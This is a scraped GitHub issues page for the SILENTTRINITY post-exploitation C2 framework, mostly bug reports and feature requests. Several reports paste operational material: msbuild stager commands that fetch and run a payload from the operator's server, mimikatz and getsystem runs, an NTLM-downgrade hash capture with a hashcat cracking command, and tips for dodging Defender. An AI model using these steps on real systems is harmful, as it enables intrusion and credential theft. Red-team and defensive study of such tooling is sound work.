byt3bl33d3r / silenttrinity Goto Github PK
View Code? Open in Web Editor NEWAn asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
License: GNU General Public License v3.0
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
License: GNU General Public License v3.0
Hello @byt3bl33d3r,
It would be cool if all the actions and results could be logged, just like the spool
command with metasploit.
Cheers dude !
EDIT : I see that this feature is already possible but not enabled, a user option is more than welcome
Line 154 in 907eee2
Add an interactive shell module, that essentially drops you into a windows like shell (instead of having to set the 'command' option in the cmd module.
Alternatively (or in addition), add the ability to control the beacon timing (such that I can set it to 1, and get almost immediate responses).
Will the Wiki updated? How can I submit pages to the Wiki? Example: https://github.com/davidtavarez/SILENTTRINITY/wiki/Generating-stagers
Hey there!
Is it possible to update Mimikatz to version 2.1.1-20181209?
Thanks in advance!
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
Run a powershell command.
Throws an error:
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
Used msbuild to create agent. I cannot run any command, whether it's just 'dir' or 'ping', I get the same error.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,850] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
[2019-02-08 15:58:44,925] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,933] 192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
INFO:quart.serving:192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,315] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
[2019-02-08 15:58:45,389] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
[+] aa219fb6-8e99-4e23-a7e4-1142a83a5590 returned job result (id: odTHLXlJ)
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,399] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
Establish Session between victim windows 10 and ST server running on Kali OS
When executing msbuild.exe on the generated msbuild.xml file, it fetches the stage.zip successfully but failed to build.
Error is listed below.
Please provide detailed steps for reproducing the issue.
Windows 10 x64 client:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe 'C:\Users\tester\Desktop\msbuild.xml'
Microsoft (R) Build Engine version 4.7.3056.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 26/3/2019 11:39:47 PM.
URL: https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Attempting HTTP GET to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "C:\Users\tester\Desktop\msbuild.xml" on node 1 (default targets).
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
Done Building Project "C:\Users\tester\Desktop\msbuild.xml" (default targets) -- FAILED.
Build FAILED.
"C:\Users\tester\Desktop\msbuild.xml" (default target) (1) ->
(Hello target) ->
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
0 Warning(s)
1 Error(s)
Time Elapsed 00:08:15.00
No error from the running st.py on my kali OS.
Able to see the staging established successfully.
Kali OS:
ST (stagers)(msbuild) ≫ generate https
[+] Generated stager to msbuild.xml
[] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[] Sending stage (2068193 bytes) -> 192.168.0.111 ...
ST (stagers)(msbuild) ≫
Hey byt3bl33d3r,
big fan of your work,
I notice in /module/src/safetykatz.py
the output folder destination " {0}\Temp\debug.bin "got block by default on my windows10
i change it to :
dumpFile = "{0}\system32\spool\drivers\color\debug.bin".format(systemRoot)
And it work , continue the good work !!
Thanks for the awesome work!
I tried to setup/install ST on Kali linux arm and amd64bit followed your step by step instructions however the dependecies fails to install.
OS
Linux nix 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
errors:
An error occurred while installing aiofiles==0.4.0
An error occurred while installing cryptography==2.7
An error occurred while installing hypercorn==0.6.0
An error occurred while installing hyperframe==5.2.0
An error occurred while installing multidict==4.5.2
An error occurred while installing pycparser==2.19
As per your instructions - python3.7 installed, i also tried pipenv throws similar issues.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
pip3 install pipenv && pipenv install && pipenv shell
Any suggestions ideas? Thanks
I fired up my Windows 10 test VM just now and received an update for Defender Virus & Threat setting (march 4. 2019). Launched the msbuild.xml file and Defender popped a Threat Notification. 2 days ago, Defender did not catch it... yet.
Behavior: Win32/Quiltan.A!sms
Recommended action: Quarantine threat now.
Windows Defender as of March 4, 2019 is picking up msbuild.xml being executed. Renaming the msbuild.xml file did not change anything.
Defender is blocking backdoor connection back to Kali Silenttrinity.
Please provide detailed steps for reproducing the issue.
Please include any relevant log snippets or files here. Try using: python3.7 st.py -d
to get more information.
Expected help on sessions, or an error about a non-existent option...
st.py server crashed when running 'sessions -h'
ST (sessions) ≫ sessions -h
Traceback (most recent call last):
File "st.py", line 163, in
loop()
File "st.py", line 140, in call
self.parse_result(result)
File "st.py", line 95, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable
I keep forgetting I need to 'start' listeners, vs 'run' modules. It would be nice is ST was a little more forgiving, and both 'run' and 'start' worked to kick off a listener.
Along those same lines, it would be nice if it were not case sensitive with commands. For instance when setting a listening port "set port 8080" throws an 'unknown option port' error because the 'P' was not capitalized.
Try running a listener with the run command. It wont start. Likely wise when setting a port with a lower case 'p'.
Sessions run modules/tasks asynchronously, the way this is currently implemented (threads) has the unfortunate consequence of mixing up module's output if more than one is running at the same time because we're just hooking STDout using Console.SetOutput()
. (https://github.com/byt3bl33d3r/SILENTTRINITY/blob/master/core/teamserver/data/stage.boo#L359-L379)
We really have only two options (unless i'm missing something obvious) to fix this:
print
statement for a modules output but would complicate the code considerably )StringBuilder()
object to each module and append the output to it (this would allow us to keep using threads but we won't be able to use the print
statement anymore to handle output which is really pretty)Like the title say i just want to ask if it is possible to implement renaming the agent after he pop upp like in Empire?!
Thanks for the amazing work and like i already said on twitter you are an amazing coder and pentester, one of the best!!! and all your github prove it!!!
Hi, I'd like to report what I think could be a bug and a couple of suggestions (non feature requests, I know PR is the right path for that). Thanks in advance.
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
Receive a stager once the .exe file is run under windows (AV is off). It was working yesterday and is failing today, so it seems some kind of bug.
Another expected behavior is to launch a "sessions" command without seeing any error even without any active session.
Just a timeout. It worked for me yesterday, but after doing git pull with the commits done today is not working anymore. Is hard to say you which exactly version due the messy versioning method. As a suggestion I could say that commits to master shouldn't be allowed (the branch can be protected on github) and after some commits on a a dev branch, a PR to master could be done and tagged as a new version. In this way is easier for you and for users to track what is happening and when. A CHANGELOG.md file could also help here. The sha1 of the commit on which I'm testing is b43044f2a343ff497ea9d1c931401a6523074904
On the screenshot you can see (upper-left) an error shown on teamserver console after launching a simple "sessions" command while there is no any active session.
Please provide detailed steps for reproducing the issue.
python3 teamserver.py 192.168.0.161 xxxxxxx
python3 st.py wss://elvis:[email protected]:5000
listeners, use https, options, start https
stagers, use exe, generate https
stager.exe 206e3d7a-8df6-4c73-bdb7-9a6cd38ce24e 84e8b494da44aa861e11cc67d35dde9fa92230698d015c1eb67b40e6d2ae5f2b https://192.168.0.161
As a final suggestion I can say that after creating the .exe stager... is hard to know what is the guid and the psk. As you can see in the screenshot (bottom-right) I opened the sqlite db to get the right values. It could be nice to print on client c&c screen the right values once the stager is created to avoid that manual searching of the right values.
Thanks! this tool seems promising!
Currently, the Mimikatz module embeds a custom version of SharpSploit to load and execute the Mimikatz DLLs in memory (it's just calling Assembly.Load() on it). From an Opsec perspective this sucks cause it's a static assembly, doesn't get dynamically compiled on the endpoint and it's just another thing AMSI can trigger on in .NET 4.8.
Ideally I would LOVE to port over the SharpSploit PE Loading code to Boolang so this entire issue goes away but it's def not trivial and is going to require a decent amount of time.
Hey,
Is it possible to add mshta based exploits? Generating html applications and running it with mshta shouldn't be a problem, I guess.
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master
branchEither as BindIP
is set, or before saying the server has been started with the start
command, I'd expect ST to validate that the BindIP
given is one that can be bound.
Currently there's no feedback given about improper BindIP
options in the client:
[1] ST (listeners)(http) ≫ options
┌Listener Options─────────┬───────────────────────────┬───────────────────────────────────────────────┐
│ Option Name │ Required │ Value │ Description │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Name │ True │ http │ Name for the listener. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ BindIP │ True │ 192.168.252.192.168.252.1 │ The IPv4/IPv6 address to bind to. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Port │ True │ 80 │ Port for the listener. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ CallBackURls │ False │ │ Additional C2 Callback URLs (comma seperated) │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Comms │ True │ http │ C2 Comms to use │
└──────────────┴──────────┴───────────────────────────┴───────────────────────────────────────────────┘
The stager does give the following errors:
From PowerShell stager:
[*] Attempting HTTP POST to http://192.168.252.192.168.252.1/705213ab-e9e7-4f0d-8942-5b61719af2f4
[-] Attempt #1
[!] The remote name could not be resolved: '192.168.252.192.168.252.1'
[-] Attempt #2
[!] The remote name could not be resolved: '192.168.252.192.168.252.1'
Please provide detailed steps for reproducing the issue.
BindIP
start
commandI think I've given all the relevant logs in Failure Information, but I can provide more information if needed.
Hey,
I would love to see cmedb get integrated with ST . Normally, wouldn't have asked this but since you're the creator of both these awesome tools, it made sense.
When a new session is connected, SSLErrors start spamming out.
However, the session remains alive and can run modules without problems.
It seems ST is unforgiving and particular when it comes to special characters in the shell module command option. For instance in order to successfully get a directory listing of C:\ Your command must be "dir C:\\" or it won't work. Furthermore, I have yet figured out how to handle spaces, so I can list the contents of something like "C:\Program Files" (I tried escaping the space with a backslash, two backslashes, quotation marks around the whole thing, escaping those quotation marks, etc etc).
Ultimately it would be nice if the end user didn't have to figure out proper escaping. For instance;
set Command dir "C:\Program Files"
If thats not possible, due to how you are processing module parameters, then maybe the next best thing is to include proper escaping techniques in the "Command" option description (listed when you type "options".
HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client
Module = ipy/shell
Doing test with ST
Everything run fine ... until i got this (windows side)
PS C:\Users\ddd\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.7.3056.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.
La génération a démarré 01/08/2019 16:56:07.
URL: http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Trying to resolve assemblies by staging zip
Attempting HTTP POST to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Attempting HTTP GET to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Downloaded 1950224 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Dynamic.dll in zip
'Microsoft.Dynamic, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.Modules.dll in zip
'IronPython.Modules, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Did not find IPY stdlib in embedded resources: La séquence ne contient aucun élément.
Found IronPython.dll in zip
Found Main.py in zip
And then no session is created on ST
i apologize if it's my fault because i miss something ... but i can't figure out what by now
thanks
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
Please describe the behavior you are expecting.
What is the current behavior?
Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.
Please provide detailed steps for reproducing the issue.
Please include any relevant log snippets or files here. Try using: python3.7 st.py -d
to get more information.
Setup:
The listener should open the port configured in the "listerners/http" set up.
After setting up the listener and started it doesn't open the port and the target host cannot reach the listener handler
Starting the listener (Debug info from the teamserver):
2019-08-17 16:38:02,073 3296 MainThread - [DEBUG] protocol.py: write_frame - server >
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "wfH3LrCwSx",
"ctx": "listeners",
"name": "list",
"status": "success",
"result": {"http": {"name": "http",
"author": "@byt3bl33d3r",
"description": "HTTP listener",
"running": true,
"options": {"Name": {"Description": "Name for the listener.",
"Required": true,
"Value": "listen_http"},
"BindIP": {"Description": "The IPv4/IPv6 address to bind to.",
"Required": true,
"Value": "10.0.2.15"},
"Port": {"Description": "Port for the listener.",
"Required": true,
"Value": "8123"},
"Comms": {"Description": "C2 Comms to use",
"Required": true,
"Value": "http"}}}}}', rsv1=False, rsv2=False, rsv3=False)
Stopping the listener (Debug info from the teamserver):
2019-08-17 16:39:40,705 3296 MainThread - [DEBUG] protocol.py: write_frame - server >
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "RyPmvQyfgV",
"ctx": "listeners",
"name": "stop",
"status": "success",
"result": null}', rsv1=False, rsv2=False, rsv3=False)
python3 st.py wss://username:[email protected]:5000
listeners
use http
set Port 8123
start
list
Out-CompressedDll -FilePath SILENTTRINITY_DLL.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
When I use the default b64 string from the template msbuild.xml no error, but when I use the one from the compiled project, the b64 is not working.
Error with the base64 of SILENTTRINITY_DLL.dll
Ps$> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.8.3761.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.
La génération a démarré 25/05/2019 19:12:10.
Projet "C:\Users\bonclay\Desktop\msbuild.xml" sur le noud 1 (cibles par défaut).
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.Invoke(Object
obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Génération du projet "C:\Users\bonclay\Desktop\msbuild.xml" terminée (cibles par défaut) -- ÉCHEC.
ÉCHEC de la build.
"C:\Users\bonclay\Desktop\msbuild.xml" (cible par défaut) (1) ->
(Hello1231231321321321 cible) ->
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.Invoke(Object
obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Is it possible to add a local / remote port forwarding feature ?
HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client, under the context of a domain user in the local administrators group
Module = ipy/mimikatz
run all
Output:
[+] f83a38c9-14fe-44ad-870f-2d70fc3e24e7 returned job result (id: LJpKMPve)
[-] Not in high integrity process
ST Should attempt to elevate privileges to system, before running the Mimikatz and/or any LSASS related modules. Alternatively create a separate module (such as MSF 'get system') which would achieve this purpose.
Even if the session is running under the context of a user in the administrators group, LSASS modules, fail to execute (dump memory).
When trying to navigate through the CLI, typing an invalid option causes the CLI to crash.
Either going to the modules menu or the application giving an error message.
Python crashes.
Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.
ST (modules)(ipconfig) ≫ modules
ST (modules)(ipconfig) ≫ sessions
ST (sessions) ≫ sessions modules
Traceback (most recent call last):
File "st.py", line 143, in <module>
loop()
File "st.py", line 120, in __call__
self.parse_result(result)
File "st.py", line 94, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), ``args=command[1:])
TypeError: the first argument must be callable
Do you think you might be able to use COM interop to open the ZIP file using the "Shell.Application" COM interface?
Just a suggestion.
Is it possible to add additional headers for request to facilitate domain fronting? How can I hack the code to get this functionality?
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master
branchThe stop
command from within the listeners
context should stop the listener.
Currently I wasn't able to stop a listener other than restarting teamserver.py
[1] ST ≫ listeners
[1] ST (listeners) ≫ use http
[1] ST (listeners)(http) ≫ set Port 8000
[1] ST (listeners)(http) ≫ list
[1] ST (listeners)(http) ≫ start
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫ stop
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫
A separate terminal window shows python3
is still listening:
jeff@blue:~/dev/SILENTTRINITY$ lsof -ni | grep :8000
python3 12973 jeff 23u IPv4 131287 0t0 TCP 10.153.143.148:8000 (LISTEN)
Start to finish is shown under Failure Information
I can provide more information if needed, but I think the above is enough to replicate this from scratch.
https://github.com/microsoft/ClearScript
Cause reasons :)
flake8 testing of https://github.com/byt3bl33d3r/SILENTTRINITY on Python 3.7.0
$ flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
./Server/modules/src/mimikatz.py:37:49: E999 SyntaxError: invalid syntax
print "[+] Running in high integrity process"
^
./Server/modules/src/excelshellinject.py:11:39: E999 SyntaxError: invalid syntax
print "[*] Excel Version installed: {}".format(app_version)
^
./Server/modules/src/msgbox.py:7:14: E999 SyntaxError: invalid syntax
print 'Popped'
^
./Server/modules/src/powershell.py:31:23: E999 SyntaxError: invalid syntax
print PowerShellExecute("COMMAND_TO_RUN")
^
./Server/modules/src/safetykatz.py:39:49: E999 SyntaxError: invalid syntax
print "[+] Running in high integrity process"
^
./Server/modules/src/shell.py:9:45: E999 SyntaxError: invalid syntax
print "[*] Path: {} Command: {} Args: {}".format(Path, ShellCommandName, ShellCommandArguments)
^
./Server/modules/src/msilshellexec.py:267:21: E999 SyntaxError: invalid syntax
print "[*] Type : {}".format(type(assembly))
^
./Server/modules/src/execute-assembly.py:22:22: E999 SyntaxError: invalid syntax
print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
^
./Server/data/stage.py:162:46: E999 SyntaxError: invalid syntax
if DEBUG: print "Running job (id: {})".format(job['id'])
^
9 E999 SyntaxError: invalid syntax
9
boo/internalmonologue
doesn't show whether hash is NTLMv1 or NTLMv2, and gives wrong format for NTLMv2 hashes.
Upstream repo doesn't accept issues, so per conversation with @byt3bl33d3r I'm filing this here instead.
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master
branchIf internalmonologue attack fails to retrieve an NTLMv1 hash and has to show the NTLMv2 one instead, it should be in the right format.
Console output below. Victim is Windows 10 Enterprise 1809 as a VM, with Credential Guard enabled (using the Microsoft Device Guard readiness tool:
[1] ST (modules)(boo/internalmonologue) ≫ use boo/getsystem
[1] ST (modules)(boo/getsystem) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: qDkTV0bDZ4)
Getting system...
Impersonating NT AUTHORITY\SYSTEM...
Processes for NT AUTHORITY\SYSTEM: 37
Attempting to impersonate: NT AUTHORITY\SYSTEM
Successfully impersonated: NT AUTHORITY\SYSTEM
[1] ST (modules)(boo/getsystem) ≫ use boo/internalmonologue
[1] ST (modules)(boo/internalmonologue) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: mGySQy9xKR)
Running elevated
Performing NTLM Downgrade
Starting impersonation
S-1-5-21-2347759232-2198512603-1203408765-1000 RuntimeBroker
Impersonated user DESKTOP-2LDSJOS\sysadmin
sysadmin::DESKTOP-2LDSJOS:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000:1122334455667788
Restoring NTLM values
Trying to crack that hash with hashcat
:
jeff@blue:~/dev/SILENTTRINITY$ sudo hashcat -m 5500 /tmp/ntlmv1.txt /opt/Passwords/breachcompilationuniq.txt -O -w4 --force 2>/dev/null| grep Token
Hashfile '/tmp/ntlmv1.txt' on line 1 (sysadm...64006d0069006e000000000000000000): Token length exception
Per hashcat
documentation, the challenge in the NTLMv2 hash is in the wrong place from the internalmonologue attack. The fix is to put it after the computer name, as follows:
jeff@blue:~/dev/SILENTTRINITY$ cat /tmp/hash
sysadmin::DESKTOP-2LDSJOS:1122334455667788:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000
Shown above.
boo/internalmonologue
module.I can provide more information if needed, but I think the above is enough to replicate this from scratch.
I installed .NET core the other day on MacOS and it seems to be pretty straight forward. Plus there seems to be packages for it for almost every *nix os that I'd ever use (including Arch!).
I set up Silent Trinity on Kali and retrieved all the requirements with pip. Launched st.py with python3 successfully.
Set up a listener and a stager using msbuild. Transferred the msbuild.xml to target box and launched it with MSbuild.exe
I get the error:
Error downloading https:///stage.zip: The underlying connection was closed: An unexpected error occurred on a send.
It seems not to be able to get the stager and the Windows box is in the same network as the listener box.
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
run module ipy/mimikatz without generating an exception
Launching the build on the Windows target system sometimes generates a 'HMAC not valid' exception. File"/root/SILENTTRINITY/Server/core/crypto.py", line 99, in decrypt raise CryptoException("HMAC not valid")
Sometimes it works to create the session and then running the ipy/mimikatz module creates the same exception.
Often everything works fine.
After error occurs, module will not run
Please provide detailed steps for reproducing the issue.
Start Silent Trinity
cd SILENTTRINITY/Server/
python3.7 st.py -d
Start http Listener
listeners
use http
start
#run the following in a command shell \Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \192.168.88.128\SMB\msbuild.xml
#wait for the new session
sessions
modules
use ipy/mimikatz
run all
Please include any relevant log snippets or files here. Try using: python3.7 st.py -d
to get more information.
Holla at you dudettes,
First of all, big thank you for your great work on the readme.md - helped me to understand all of this in a couple of minutes.
I got a feature-request on the zip-file exchaning:
In my opinion it would make sense, that the zip-blob is being encrypted server-sidely before sending it to the C#-agent.
If the ZIP-file is fetched by a sandbox or by an analyst, it is useless without the key, which is maybe implemented in the binary.
Hope i can contribute to this project in the near future 👍
hey,
I have just tested your great tool and I have to say that I like it very much! Good job!
But it would be helpful if it would have the possibility to stop single sessions and listeners.
Thank you very much!
ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 10.0.0.113
